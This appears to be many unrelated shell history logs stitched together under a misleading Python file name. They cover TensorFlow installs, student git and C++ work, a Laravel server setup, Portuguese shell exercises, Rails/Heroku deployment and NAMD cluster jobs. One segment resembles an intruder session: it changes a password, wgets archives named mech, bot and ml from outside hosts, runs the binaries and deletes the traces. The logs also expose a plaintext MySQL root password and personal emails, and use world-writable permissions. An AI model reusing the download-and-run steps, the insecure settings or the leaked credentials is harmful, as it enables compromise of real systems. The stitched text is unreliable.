dqn_cartpole.py +ls +ls +sudo pip3 install --ignore-installed --upgrade /TF/tensorflow-1.4.0-cp35-cp35m-linux_x86_64.whl +sudo pip3 install --ignore-installed --upgrade tensorflow-1.4.0-cp35-cp35m-linux_x86_64.whl +pip freeze +cls +clear +ls +cat t t2 +ls +clear +su +clear +# +clear +ls +ls -l +clear +ls +ls +chmod +pwd +clear +pwd +root +clear +ssh +clear +bash +teste +mkdia +clear +ls +ls +ls +ls +clear +sls +ls +ls +pwd +clear +ls +clea +clear +ls +ls +ls +clear +ls +ls +clea~~~exit +exit +ls +clear +ls +ls +./tiago +clear +ls +ls -l +ls +vi teste +ls +ls +ls -l +./tiago +clear +./tiago +clear +ls +ls -l ~/bin +ls -a ~/bin +ls -a ~/ +mv tiago teste ~/bin/ +ls +ls +./tiago +clear +exit +ls +ls +./tiago +clear +./tiago +l +clear +./tiago +./tiago +clear +./tiago +chmod +x tiago + +./tiago +ls +clear +vi tiago +vu +clear +clear +exit +exit +ls +ls +clear +ls +vi tiago +ls +ls +vi tiago +ls +vim tiago +ls +clear +vim tiago +ls +clear +vim tiago +>tiago +ls +clear + tiago +ls +> tiago +ls +mv -mr tiago +clear +rv -rm tiago +clear +ls +clear +> vim tiago +ls +clear +ls +mv -rm tiago +clear +rm tiago +ls +rm vinm +rm vim +ls +clear +vim scripttiago +ls +vim scripttiago +ls +clear +ls +vim teste +ls +vi teste +clear +./tiagoscript +chmod +x tiagoscript +./tiagoscript +clear +exit +kill ./tiagoscript +man kill +kill tiagoscript +ls +ls +ls -l +ls +ecxit +exit +./tiagoscript +exit +sudo apt install build-essential +sudo apt install build-essential +sudo apt install build-essential +osboxes.org +sudo apt install g++ +osboxes.org +g++ --version +sudo apt install g++ +g++ --version +sudo apt install build-essential +apt-get install g++ +sudo apt install g++ +sudo apt-get install g++ +sudo apt-get update +sudo apt-get install build-essential +g++ +gcc +nano +nano esther.cc +g++ -o esther esther.cc +./esther +del demo.cc +delete demo.cc +nano a2_10679574.cc +g++ -o a2_10679574 a2_10679574.cc +nano +g++ -o a2_10679574 a2_10679574.cc +g++ a2_10679574 a2_10679574.cc +g++ -o a2_10679574 a2_10679574.cc +./a2_10679574 +git init +git add +sudo apt install git +git CSCD205 +git add +git add a2_10679574.cc +git init +git add +git add a2_10679574.cc +git commit -m "first commit" +git commit -m estheraseyoro +git commit -m "estheraseyoro" +git remote add origin +git remote add originstherAseyoro/CSCD205.git +git remote -v +git push -u origin master +git EstherAseyoro +git init +git add +git add a2_10679574 +git commit -m "a2_10679574" +git config --user.name "EstherAseyoro" +git commit -m "first commit" +git commit -m "Add existing file" +nano A3_10679574 +nano +nano A3_10679574.cc +g++ -o A3_10679574 A3_10679574.cc +./A3_10679574 +g++ -o A3_10679574 A3_10679574.cc +./A3_10679574 +nano switch.cc +g++ -o switch switch.cc +git config --global user.name "EstherAseyoro" +git config --global user.email "esteeblacksmith87@gmail.com" +git init Myassignment +git add A3_10679574.cc +git add A3_10679574.cc +git commit -m "commit" +git remote add originstherAseyoro/Myassignment.git +git push origin master +git remote add originstherAseyoro/Mytest.git +git push origin master +git rm image12/ +git rm image12/ -r +git status +git commit -a -m "delete some sensetive datas" +git remote git@github.com:GainSury/urp-spider.git +git remote add origin git@github.com:GainSury/urp-spider.git +git status +git commit +git config --global user.email "ganluo3216@163.com" +git config --global user.name "Gain Sury" +git commit -a -m "delete some sensetive datas" +git push origin master +git push origin master +git push origin master +git push origin master +git remote add origin git@github.com:GainSury/urp-spider.git +git remote add origin git@github.com:GainSury/urp-spider.git +git push origin master +$ git push origin master +ssh: connect to host github.com port 22: Connection timed out +fatal: Could not read from remote repository. +ssh: connect to host github.com port 22: Connection timed out +fatal: Could not read from remote repository. +Please make sure you have the correct access rights +and the repository exists. +git push origin master +git push +git push origin master +git status +git rm image12/ +git rm image12/ -r +uname -a +ls -la +wget +uname -a +ls -la +passwd +ls -la +wget adutzu.go.ro/mech.tgz +tar zxvf mech.tgz +wget adutzu07.uv.ro/linux/bot.tar +wget adutzu07.uv.ro/linux/ml.tar +tar xvf ml.tar +ls -la +./mech +make +ls -la +rm -rf ... +ls -la +rm -rf ml.tar +rm -rf mech.tgz +ls -la +wget adutzu.go.ro/linux1.tgz +tar zxvf linux1.tgz +ls -la +make +ls -la +wget adutzu.go.ro/e.tgz +tar zxvf e.tgz +rm -rf e.tgz +./I +./90 +rm -rf .e +ls -la +rm -rf linux1.tgz +exti +exit +su +apt get +apt update +sudo apt install apache2 +ufw app list +ufw app info "Apache Full" +ufw allow in "Apache Full" +apt install curl +apt install mysql-server +mysql_secure_installation +mysql +mysql -u root +mysql -u root -p EcollectionZ2019* +mysql -u root -p +sudo apt-get install php7.1 +sudo apt-cache search php7.1 +apt-get install software-properties-common +add-apt-repository ppa:ondrej/php +apt update +nano /etc/php/7.1/apache2/php.ini +nano /var/www/html/phpinfo.php +apt-get update +apt-get install phpmyadmin php-mbstring php-gettext +apt-get install git-all +apt-get install phpmyadmin php-mbstring php-gettext +php -r "copy();" +php -r "if (hash_file('SHA384', 'composer-setup.php') === '669656bab3166a7aff8a7506b8cb2d1c292f042046c5a994c43155c0be6190fa0355160742ab2e1c88d40d5be660b410') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" +php composer-setup.php +apt install composer +php -r "copy();" +php -r "if (hash_file('SHA384', 'composer-setup.php') === '669656bab3166a7aff8a7506b8cb2d1c292f042046c5a994c43155c0be6190fa0355160742ab2e1c88d40d5be660b410') { echo 'Installer verified'; } else { echo 'Installer corrupt'; unlink('composer-setup.php'); } echo PHP_EOL;" +php -r "copy();" +php composer-setup.php +php -r "unlink('composer-setup.php');" +apt install composer +composer create-project --prefer-dist laravel/laravel myapplication +ls +ls -l +sudo nano ../etc/apache2/sites-available/my_app.conf +ls +nano ecollections.conf +nano ecollectionz.conf +sudo a2ensite ecollectionz.conf +sudo service apache2 reload +rm ecollectionz.conf +sudo service apache2 reload +php artisan +sudo chmod -R 777 bootstrap/ storage/ +ls -l +nanpo .env +nano .env +sudo mv composer.phar /usr/local/bin/composer +composer install +sudo chmod -R 775 /var/www/YourWork/storage +sudo chmod -R 77 storage/ +sudo chmod -R 77 bootstrap/cache/ +sudo chmod -R 775 bootstrap/cache/ +sudo chmod -R 775 storage/ +php artisan key:generate +sudo chown -R $USER:www-data storage +sudo chown -R $USER:www-data bootstrap/cache +chmod -R 775 storage +chmod -R 775 bootstrap/cache +composer update +apt install composer +composer +composer install --no-dev +ll +php artisan key:generate +a2enmod rewrite +sudo nano /etc/apache2/apache2.conf +sudo /etc/init.d/apache2 restart +nano .env +sudo /etc/init.d/apache2 restart +composer require midium/laravel-ckeditor:dev-master +composer require midium/laravel-ckeditor:dev-master +composer install +php artisan key:generate +ifconfig +top +sudo ls +ls +ls -l +cat authorized_keys +vi authorized_keys +chmod -R go= ~/.ssh +ls -l +ls -lix +ls -lixa +ls -la +lsb_release -a +chmod -R 700 ~/.ssh +chmod 600 ~/.ssh/authorized_keys +ls -la +ls -l +chmod 600 authorized_keys +ls -l +adduser ecollect +usermod -aG ecollect +usermod -aG sudo ecollect +su ecollect +cat authorized_keys +vi authorized_keys +su ecollect +ftp -p +ftp -p +chmod -R 777 ecollectionz/ +composer update +composer install +top +ls -l +ls +ls -l +ls +ls +ls -l +sudo nano php.ini +service apache2 restart +service apache2 stop +service apache2 start +nano error.log +service apache2 start +service apache2 stop +service apache2 start +service apache2 stop +service apache2 start +service apache2 stop +service apache2 start +ls +./label_ui.py --image-dir sample_data/training/ --label-db sample_data/labels.db --width 768 --height 1024 +./materialise_label_db.py --label-db sample_data/labels.db --directory sample_data/labels/ --width 768 --height 1024 +pip install scikit-image +./materialise_label_db.py --label-db sample_data/labels.db --directory sample_data/labels/ --width 768 --height 1024 +sudo pip3 install -r requirements.txt +sudo apt-get install python3-tk python3-pil python3-pil.imagetk +sudo pip3 install -r requirements.txt +pip install tensorflow-gpu +pip install anaconda +pip install tensorflow-gpu +python --version +vi +gedit hau.txt +gedit hau.java +javac hau.java +clear +sudo su +cat /etc/issue +cat /etc/*release* +lsb_release -a +java --version +javac --version +gedit eclipse.desktop +git init +sudo su +crontab -e +ls +ls +nano dynu.log +logout +userdel pi -r +sudo userdel pi -r +sudo adduser pi +ls +nano dynu.sh +crontab -e +sudo raspi-config +crontab -e +apt install openssh-server +sudo apt install openssh-server +reboot +sudo reboot +sudo nano /etc/ssh/sshd_config +sudo nano /etc/dhcpcd.conf +logout +ssh-keygen +logout +mkdir aula +ls -l +touch teste +ls -l +pwd +ls -l +vi jair.txt +vi jair.txt +mcedit jair +nano jair +vi jairpirescruzvim +ls -l +nano jairpirescruznano +echo $PATH +ls -l +mkdir bin +ls -l +vi primeiro +ls -l +chmod +x primeiro +ls -l +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +primeiro +vi primeiro +ls -l +vi jairpirescruzvim +ls -l +jair +bin +aula +ls -l +primeiro +vi bin +vi jair +variavel="estou sem ideias" +echo $variavel +echo $variavel$variavel +hoje=$(date) +echo "hoje : $hoje" +hoje='date' +echo "hoje : $hoje + + + +" +cat -n primeiro +ls -l +primeiro +cat -n primeiro +cat -n primeiro +primeiro +vi primeiro +vi primeiro +primeiro +ls -l +vi +ls -l +vi jairpirescruzvim +ls +vi primeiro +primeiro +vi primeiro +vi teste +vi primeiro +vi teste +rm teste +ls +vi teste +vi primeiro +ls -l +ls +vi trabalho +chmod +x trabalho +trabalho +ls -l +ls -l +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +vi primeiro +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +vi trabalho +trabalho +who +who +free +date +pwd +df +who +m +ps +history +cat +free +FREE +trabalho +pwd +vi trabalho +rm trabalho +ls +ls -l +vi trabalho +trabalho +cat trabalho +cat -n trabalho +man cat +man cat +mancat +man cat +vi trabalho +man cat +MAN CAT +ls -l +ls -l +pwd +man ls +grep -n +grep -n primeiro +ls +grep -n primeiro +vi teste +ls +echo "vida" > /bin/teste +chmod x+ teste +/. teste +vi teste +chmod 751 teste +teste +cat teste +echo "vida" > /teste +chmod +x teste +/. teste +ls -l +cat primeiro +vi teste +teste +echo "vida" > /teste +// +vi find +[]'~~]][[[;;;..,,//\\\\qqqq/wwwertyuiopplkjhgfffdddsssaaaazzxxxcccvvvbbnnnnmmm,,,,*//111111''''''QQ!!11! +du -h +uname -a +ggVG +CD /ETC +cat passwd +userdel -r jairkrt@gmail.com +/.passwd +ls +cat -n passwd +cat -n /etc/passwd +-d: -f2 /etc/passwd +-d: -f1 /etc/passwd +cut -d: -f1 /etc/passwd +ls +cat /home +sed -n /etc/passwd +comannd seq +ls +ls +ls -l +ls -l +pwd +ls +ls +ls +trabalho +trabalho +ls +cat aula +vi aula +aula +/. aula +ls +cat teste +teste +vi trabalho +su +su +uname +uname -a +w +help cd +help cat +info cat +cal +vi trabalho +ls +ls -l +vi trabalho +trabalho +vi trabalho +cat trabalho +vi trabalho +ls +ls +cat primeiro +ls -l +ls -l +echo "informe usuario:"; read user ; +echo $user +test "$user" = "redes" && echo "user: $user" || echo "user: errado" +test "$user" = "cabrito" && echo "user: $user" || echo "user: errado" +test "$user" = "redes" && echo "user: $user" || echo "user: errado" +test "$user" = "redes" && echo "usuario digitado: $user" || echo "user: errado" +ls +cat primeiro +vi exercicio +ls -l +ls +wq +echo "vida" > /teste +rev /teste +echo "www.cablepoint.com.br"|rev +echo "www.cablepoint.com.br"||rev +echo "www.cablepoint.com.br"|rev +echo "vida" > /bin/teste +ls +vi trabalho +trabalho +cat -n /etc/password +cat -n /etc/password +cat -n /etc/passwd +ls +vi trabalho +grep -i "vida\|arte" * +vi trabalho +echo "vida" > /bin +echo "vida" > /bin/teste +teste +chmod 777 teste +echo "vida" > /bin/teste +chmod 777 teste +echo "vida" > /bin/teste rev /bin/teste +rev teste > teste +vi teste02 +teste02 +pwd +chmod +x teste02 +teste02 +rev teste > teste02 +rev "teste" > "teste02" +echo | rev +rev teste +rev "teste" +rev teste.txt +rev teste.txt +echo www.cablepoint.com.br | rev +echo"www.cablepoint.com.br" | rev +echo "www.cablepoint.com.br" | rev +vi trabalho +sed -n teste +sed -n 1p teste +ls -l +vi trabalho +ls +ls -l +ls -l +vi trabalho +vi teste +teste +teste02 +teste +chmod +x teste +chmod +x teste +teste +vi teste +cat teste +cat trabalho +cat teste02 +cat teste +vi teste +cat teste +chmod +x teste +teste +vi trabalho +seq -s, 10 -2 0 +seq 10 +sort texte -r +sort texte.txt -r +sort teste.txt -r +sort teste -r +seq 3 +seq 3 5 +seq 5 +cat trabalho +sort -n teste +sort teste -r +cat teste +vi trabalho +teste |tr 'a-z''A-Z' +echo "jair pires" | tr 'a-z''A-Z' +echo jair pires | tr 'a-z''A-Z' +tr a-z A-Z < teste +cat teste +vi trabalho +/. carro +/.carro +ls -l +cat trabalho +cat trabalho +trabalho +vi trabalho +cat -n trabalho +vi trabalho +trabalho +cat teste +cat trabalho +vi trabalho +vi teste +teste +cat teste +vi teste +cat teste +vi teste +cat teste +trabalho +vi trabalho +ls +cat aula +ls +cat teste +vi teste +rm teste +ls +ls +cat trabalho +trabalho +vi trabalho +cat teste +cat teste02 +trabalho +vi trabalho +grep -i "vida" \| "arte" * +grep -i "vida" \ "arte" * +grep -i "vida" \| "teste" * +grep -i "sei" \| "teste" * +grep -i "escrever" \| "teste" * +grep -i "escrever" \ "teste" * +grep -i "escrever" \ "/bin/teste" * +grep -i "escrever" +grep -i "pena" \| "teste"* +grep -help +grep -i '.vida' teste +grep -i '.escrever' teste +grep -i 'escrever' teste +vi teste +teste +grep -i '.vida' teste +vi trabalho +grep -l 'vida'* +grep -l '.vida' * +grep -l '.vida' * +vi trabalho +trabalho +cat trabalho +trabalho +cat -n trabalho +find / -name vida +find -name vida +find -name teste +find -name teste02 +find -name casa +find/ -name teste +vi trabalho +trabalho +vi trabalho +trabalho +cat -n trabalho +cat trabalho +cat trabalho +uniq teste +uniq -i teste +uniq -d teste +uniq -u teste +vi teste +teste +uniq -i teste +uniq -d teste +uniq -u teste +w -h +w +last -r +uniq -u /teste +uniq -u teste +cat teste +uniq -d teste +vi teste +uniq -d teste +uniq -u teste +uniq -d teste +vi trabalho +vi teste +trabalho +wc -c teste +wc -c trabalho +wc -w teste +uniq -u teste +wc -c teste +vi trabalho +clear +trabalho +clear +trabalho +jair | rev +echo jair | rev +vi trabalho +clear +trabalho +ls -d +ls +ls -l +trabalho +trabalho +ls +ls +cat teste +cat teste02 +rm teste02 +ls +cat relação +relação +trabalho +vi trabalho +vi zerador.sh +zerador.sh 10 +chmod +c zerador.sh +chmod +x zerador.sh +./zerador.sh +./zerador.sh 10 +zerador.sh +zerador.sh 10 +vi zerador.sh +./zerador.sh 10 +ls +cat teste +cat > teste02 +cat teste +cat teste02 +cat trabalho +cut -d: -f1 /etc/passwd" + + +vari=top-bm +cat trabalho +cut -d- -f1 $vari +cut -d: -f1 /etc/passwd +top-bn1 +top bn1 +top -bn1 +top -bn1 +cut -d: -f2 /etc/passwd +top -bn1 +cut -d: -f3 /etc/passwd +top -bn1 +trabalho +man wc +echo 123456| wc -c +echo -n 123456| wc -c +echo -n 123456| wc -l +echo -n 123456| wc -w +echo -n 123456 +calendar +vim trabalho +ls +ls -la +dfg +fg +ps aux | grep jair +vim teste +vim teste2 +ls -la +fg +ls -la +vim jfjhf +ls -la +fg +ls -la *.swq +ls -la *.swp +ls -la .*.swp +rm .*swp +ls -la .*.swp +ls +vim trabalho +trabalho +vi trabalho +cat trabalho +ls -l +ls +teste02 +chmod +x teste02 +teste +cat teste02 +cat teste +teste +vi teste +teste +trabalho +ls +cat primeiro +vi exercicio +rm exercicio +vi somaNum.sh +cat trabalho +vi simNao.sh +vi naoSim.sh +vi simNao.sh +fg] +fg +vi naoSim.sh +ls +ls +cat trabalho +pwd +cat trabalho +trabalho +ls +ls +pwd +cat /etc/pqsswd +cat /etc/passwd +cat trabalho +cut -f1 -d: /etc/passwd +cut -f2 -d: /etc/passwd +cut -f3 -d: /etc/passwd +cut -f4 -d: /etc/passwd +cut -f5 -d: /etc/passwd +cut /etc/passwd +cut /etc/passwod +cut /etc/password +cut /etc/passwd +cat /etc/passwd +cut -d/ -f1 /etc/passwd +cut -d/ -f2 /etc/passwd +vi exercicio +cat trabalho +vi exercicio +chmod +x exercicio +exercicio +vi exercicio +./exercio +exercicio +./exercio +exercicio +cat trabalho +cat exercicio +pwd +pwd +tail -n 10 /tcp/passwd +tail -n 2 teste +tail -n 2 teste02 +pwd +tail -n 2 teste02 +cut -d/ -f2 /etc/passwd +a=1 +b=2 +c=3 +echo "o valor de a e $a, o valor de b e $b e o valor de c e $c + + + + + + +echo "o a e $a o b e $b e o c e $c" +a=1 +b=2 +c=3 +echo "o a e $a o b e $b e o c e $c" +s=$((a*b)) +echo " o valor de s e $s" +echo $path +vi teste02 +trabalho +hoje=date +echo "hoje e $hoje" +hoje='date' +echo "hoje e $hoje" +dia='date' +echo "hoje: $dia" +hoge=$(date) +echo "hoje e $hoge" +unset hoje +echo "$hoje" +unset hoge +echo "$hoge" +cat teste +sort teste | head -3 +sort teste | head -2 +sort teste | head-2 +vi prova +chmod +x prova +prova +ls +cat exercicio +head -3 teste02 +head -3 teste +cat teste +head -8 teste +cat > teste02 +cat teste02 +ls +vi teste02 +cut -d: -f1 /etc/passwd +for i in (seq 10) +for i in $(seq 10); do echo "contagem: $i"; done +ls +ls +cat trabalho +sort teste +a=1 +b=2 +c=3 +d=4 +for num in a b c d; do echo "numero $num"; done +echo "$A" +a=1 +b=2 +for num in $a $b; do echo "numero $num"; done +echo "$a $b" +if [5 -gt 8]; then echo "menor"; else echo "maior"; fi +if [5 -gt 8]; then echo "maior"; else echo "menor"; fi +sls +ls +vi trabalho +cat trabalho +ll +sduo -i +sudo -i +ip addr +sudo -i +sudo -i +exit +ll +source stackrc +ll +source stackrc +nova list +ll +ip addr +exit +sudo -i +exit +sudo ifconfig +sudo infconfig +sudo ifconfig +ping www.ubuntu.com +sudo apt-get update +clear +sudo apt-get upgrade +sudo apt-get dist-upgrade +clear +sudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 +clear +sudo apt-get install libxml2-dev libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties libffi-dev +clear +sudo apt-get install vim +clear +sudo apt- get install git +sudo apt-get install git +sudo apt-get install unity-tweak-tool +clera +clear +sudo apt-get install autoconf automake bison build-essential curl git-core libapr1 libaprutil1 libc6-dev libltdl-dev libreadline6 libreadline6-dev libsqlite3-0 libsqlite3-dev libssl-dev libtool libxml2-dev libxslt-dev libxslt1-dev libyaml-dev ncurses-dev nodejs openssl sqlite3 zlib1g zlib1g-dev +clea +clear +sudo apt-get install git +clear +curl -L get.rvm.io | bash -s stable +clear +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 +curl -L get.rvm.io | bash -s stable +gpg2 --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 +gpg2--keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 +clear +type rvm | head -1 +rvm -V +curl -L get.rvm.io | bash -s stable +clear +type rvm | head -1 +rvm -v +rvm install 2.4.1 +clear +rvm use 2.4.1 +rvm --default use 2.4.1 +ruby -v +clear +gem install rails +clear +git config --get user.name +git config --global user.name MarkNull +git config --global user.email marknullanarus@hotmail.co.uk +git config --get user.name +git config --get user.email +git config --global color.ui auto +clear +~/.ssh/id_rsa.pub +git config --global color.ui auto +clear +ls ~/.ssh/id_rsa +clear +ssh-keygen -C marknullanarus@hotmail.co.uk -t rsa +~/.ssh/id_rsa.pub +~/.ssh/ +ssh-keygen -C marknullanarus@hotmail.co.uk -t rsa +clear +ssh-add ~/.ssh/id_rsa +sudo add-apt-repository "debssets.heroku.com/branches/stable/apt ./ +curl -Lssets.heroku.com/apt/release.key | sudo apt-key add - +sudo apt-get update +sudo apt-get install heroku +clear +clear +sudo add-apt-repository "debssets.heroku.com/branches/stable/apt ./" +heroku version +clear +heroku keys:add +CLEAR +clear +rails -v +clear +irb +quit +clear +sudo add-apt-repository ppa:webupd8team/atom +sudo apt-get update +sudo apt-get install atom +clear +sqlite3 +ira +irba +irb +clear +mkdir railsbridge +rails new test_app +rails server +rails generate scaffold drink name:string temperature:integer +rails db:migrate +rails server +rails generate scaffold drink name:string temperature:integer +rails db:migrate +rails server +git init +git add -A +git commit -m "initial commit" +git log +heroku create +git remote show +gem install bundler +bundle install --without produtction +bundle install --without production +git add. +git commit -m "Updates for heroku deployment" +git push heroku master +heroku run rails db:migrate +clear +ggem install bundler +gem install bundler +bundle install --without production +git add. +git add . +clear +git add . +git add . +git commit -m "Updates for heroku deployment" +git push heroku master +heroku run rails db:migrate +heroku open +clear +gem install bundler +git add . +git commit -m "Updates for heroku deployment" +git push heroku master +gem install bundler +git commit -m "Updates for heroku deployment" +git push heroku master +clear +git add . git commit m- "Updates for heroku deployment" +clear +exit +l +less test_namd.o57806 +less test_namd.po57806 +qsub charmrun_namd_pug_sample.sh +qstat -u '*' +qstat -u '*' +qstat -u '*' +qstat -u '*' +qstat -u '*' +qstat -u '*' +qstat -u '*' +l +less bench_24_57807.log +qstat -u '*' +less bench_24_57807.log +tail -f bench_24_57807.log +man tail +tail -f bench_24_57807.log +qstat -u '*' +namd2 +qstat -u '*' +tail -f bench_24_57807.log +man zip +ztar +l +.. +l +tar -zxvf namd-tutorial-160715.tgz +less ~/archive/.sge_request +l +l +l +l +pwd +.. +l +.. +l +.. +l +ls example-output/ +cp example-output/*conf ./ +l +ls ../common/ +l +l ../common/ +cp example-output/* ./ +l +man rsync +touch .use_wmcinit +exit +ls /usr/ +wmclogin +exit +ssh fido +pan +pug +scp +pug +wmclogin +l +la +wmclogin +exit +wmclogin +ls /usr +ls / +sllist +namd2 +sllist namd +qlogin +fido +exit +rsync -avzh --stats /home/zss2002/namd/namd-tutorial $TMPDIR +ld +ls +ls $TMPDIR +echo $TMPDIR +exit +l +pug +qlogin +l +l +echo "hello {date}" +echo "hello ${date}" +date +date '+\m' +date '+m' +date '+\M' +man date +date '+%m' +date '+%Y' +date '+%y' +date '+%y%M' +date '+%y%m%d_$H%M' +date '+%y%m%d_%H%M' +date '+%y%m%d_%H%M' +timestamp=$(date '+%y%m%d_%H%M') +echo $timestamp +echo "@#$%_${timestamp} +" +timestamp=$(date '+%y%m%d_%H%M' + +echo @#$@#$@#$@ +$(date '+%y%m%d_%H%M') +.. +l +mkdir pug_test_3-1_step3-2-3 +l +qsub pug_test_3-1_step3-2-3.sh +qstat +qstat +l +less -f pug_test_3-1_step3-2-3.o57810 +ls +l +man tar +vmd +vmdf --help +vmd --help +vmp -dispdev text +vmd -dispdev text +qstat +ls +cat pug_test_part2-1-4_step2/pug_test_part2-1-4_step2.sh +cat pug_test_part2-1-4_step2/pug_test_part2-1-4_step2.sh +l +l +cat pug_test_part2-1-4_step2.sh +l +qsub pug_test_part2-1-4_step2.sh +qstat +qstat +qstat +qstat +qstat +l +cp -R 3-1-pullcv_160715_1547.tgz 3-1 +rm 3-1 +cp -R 3-1-pullcv_160715_1547.tgz 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+printenv +which glide +which maestro +maestro +X11 +exit +ls +source maestro_2016-2 +maestro +exit +ssh zss2002@scu-maestro.med.cornell.edu +c +ssh zss2002@scu-maestro.med.cornell.edu +exit +maestro +source maestro_2016-2 +maestro +source maestro_2016-2 +maestro +export DISPLAY=X11 +maestro +export DISPLAY=XQuartz +maestro +cat maestro_2016-2 +export DISPLAY=':0.0' +maestro +XQuartz +X +exit +echo $DISPLAY +startx +source maestro_2016-2 +maestro +export DISPLAY=mac140138.med.cornell.edu:0.0 +maestro +xhost +mac140138.med.cornell.edu +hostname +exit +source maestro_2016-2 +maestro +xhost +mac140138.med.cornell.edu +maestro +man maestro +maestro -h +maestro -display mac140138.med.cornell.edu:0.0 +cat maestro_2016-2 +pwd +mkdir schrodtmp +hostname +exit +maestro +source maestro_2016-2 +maestro +cat maestro_2016-2 +exit +which maestro +cat maestro_2016-2 +maestro -v +echo $DISPLAY +exit +source maestro_2016-2 +maestro +which maestro +exit +which maestro +maestro +exit +xclock +echo $DISPLAY +xlock +xclock +exit +xclock +ls +source maestro_2016-2 +maestro +vmd /Users/zss2002/Desktop/maestroGlideIFD_5ht_s2site_5i71_160726/vmd_export/IFD_5ht_s2_160726_top4.vmd +source maestro_2016-2 +maestro +exit +ls +ll +la +edp +mv maestro_2016-2 .maestro_2016-2 +l +edp +which maestro +sc +scp +which maestro +l +ls -G +ls schrodtmp/ +ls +rmdir schrodtmp/ +l +tar -zxvf Schrodinger_160727_1200.tgz +du +du schrodinger.hosts +du Schrodinger +mkdir test +ls test/ +rm test/* +ls test/ +rm -rf test/ +ls test/ +rm -rf test/ +mv Schrodinger Schrodinger_orig +ls +pwd +pwd +ls +lt +lt +ll +du Schrodinger +du Schrodinger_orig/ +du Schrodinger +bedp +exit +source maestro_2016-2 +maestro +exit +edp +scp +edp +scp +edp +scp +edp +scp +edp +scp +exit +ls +rm -rf Schrodinger_orig/ +mv Schrodinger_160727_1200.tgz archive/ +ls +ls archive/ +l +ll +cat schrodinger.hosts +c +cat schrodinger.hosts +cat .maestro_2016-2 +mv .maestro_2016-2 maestro_2016-2 +edp +scp +hostname +exit +edp +scp +h +history +\818 +h +\819 +history +maestro +edp +scp +h +exit +edp +ls +tar -zxvf eqprepd_5ht_s1_5i71_IFDposes_160801.tgz +l +mv eqprepd_5ht_s1_5i71_IFDposes_160801 archive/ +l +ll +la +edp +l +mv archive/eqprepd_5ht_s1_5i71_IFDposes_160801/ ./ +mv eqprepd_5ht_s1_5i71_IFDposes_160801.tgz archive/ +l +l +mkdir 5ht_s1_5i71_IFDposes_equil_160801 +mv eqprepd_5ht_s1_5i71_IFDposes_160801/5ht_s1_5i71_IFDposes_equil_160801/ ./ +l +mv 5ht_s1_5i71_IFDposes_equil_160801/ namdEquil_5ht_s1_5i71_IFDposes_160801 +l +mv eqprepd_5ht_s1_5i71_IFDposes_160801/ namdEquil_5ht_s1_5i71_IFDposes_160801/ +mv namdEquil_5ht_s1_5i71_IFDposes_160801/ namd +l +mv namd namdEquil_5ht_s1_5i71_IFDposes_160801/ +l +edp +scp +ls +mv namdEquil_5ht_s1_5i71_IFDposes_160801/ namd +ls +edp +scp +mv namd namdEquil_5ht_s1_5i71_IFDposes_160801 +l +.. +mv namdEquil_5ht_s1_5i71_IFDposes_160801/ namd +l +mv eqprepd_5ht_s1_5i71_IFDposes_160801.tgz archive/ +l +l +l +l +l +.. +l +.. +l +mv namdEquil_5ht_s1_5i71_IFDposes_160801/ womp +l +l +ls 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qsub_phase1a.sh +qsub qsub_phase1a.sh +qstat -u '*' +qstat -u '*' +qstat -u zss2002 +qstat -u zss2002 +l +tail -f qsub_phase1a_160803.o57921 +pwd +l +l +cat qsub_phase1a.sh +.. +l +cat INPUTS.tcl +b +l +qsub qsub_phase1a.sh +qstat -u * +qstat -u '*' +cat qsub_phase1a.sh +qstat -u '*' +qlogin +exi +exit +ls +l namd/ +l namd/namd/ +rm -rf namd/namd/ +ls namd/ +l namd/ +l namd/namd +rm -rf namd/namd/ +l namd/namd +l namd/min_equil/ +l namd/min_equil/zme/ +realpath namd/min_equil/zme/ +pwd +l +.. +l +l +namd2 +/home/jason/namd_verbs_nogpu_pug +ls /home/jason/namd_verbs_nogpu_pug +ls /home/jason/namd_verbs_nogpu_pug/NAMD_2.7_Source/ +ls /home/jason/namd_verbs_nogpu_pug/NAMD_2.7_Source/Linux-x86_64-g++/ +ls +ls phase1/ +pwd +rm phase1/*xst +rm phase1/*txt +ls phase1/ +l +rm *xst +rm *txt +l +qsub qsub_phase1a.sh +fido +edp +pug +exit +l +l +source qsub_phase1a.sh +lt +ls -t1 +less *log +edp +namd2 +scp +scp +edp +scp +ls ~ +edp +scp +which namd2 +namd2 +exit +qlogin +scp +namd12 +namd2 +ls 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+G ~/namd/parameters_all.prm +qsub qsub_phase1a.sh +lt +lt +lt -1 +qstat -u '*' +lt +tail -f qsub_phase1a_160803.o57931 +lt +tail -f rho_equil_phase1a.log +lt +man tail +tail -f rho_equil_phase1a.log -n 100 +man tail +tail -f rho_equil_phase1a.log -n 100 +.. +l +egrep +grep -E +man grep +l +lt +qsub qsub_equil_phase.sh 1a +qstat -u '*' +l +ls phase1 +ls -1t +ls -1t phase1 +ls common/ +qsub qsub_phase1a.sh 1a +ls +qsub qsub_equil_phase.sh 1a +qjobs +edp +scp +edp +scp +qjobs +qstat -u '*' +ls phase1 +ls -1t phase1 +qsub qsub_equil_phase.sh 1a +qstat -u '*' +qstat -u '*' +qstat -u '*' +ls phase1 +ls -1t phase1 +qstat -u '*' +ls -1t phase1 +l +l1t +lt -1 +less rho_equil_pose1_phase1a.log +qsub qsub_equil_phase.sh 1a +.. +qsub qsub_equil_phase.sh 1a +less rho_equil_pose1_phase1a.log +less rho_equil_pose1_phase1a.log +qstat -u '*' +qstat -u '*' +qsub qsub_equil_phase.sh 1a +qstat -u '*' +qstat -u '*' +ls phase21 +ls phase1 +qstat -u '*' +l +cat $(litem 2) +lit +l1 +edp +scp +edp +scp +l1 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+check_mk -I --checks local control1 +check_mk -I --checks local localhost + cmk -l +check_mk -I --checks local control1.gate.rtf +check_mk -v -I --checks local control1.gate.rtf +check_mk -v -I control1.gate.rtf +check_mk -v -II control1.gate.rtf +ls 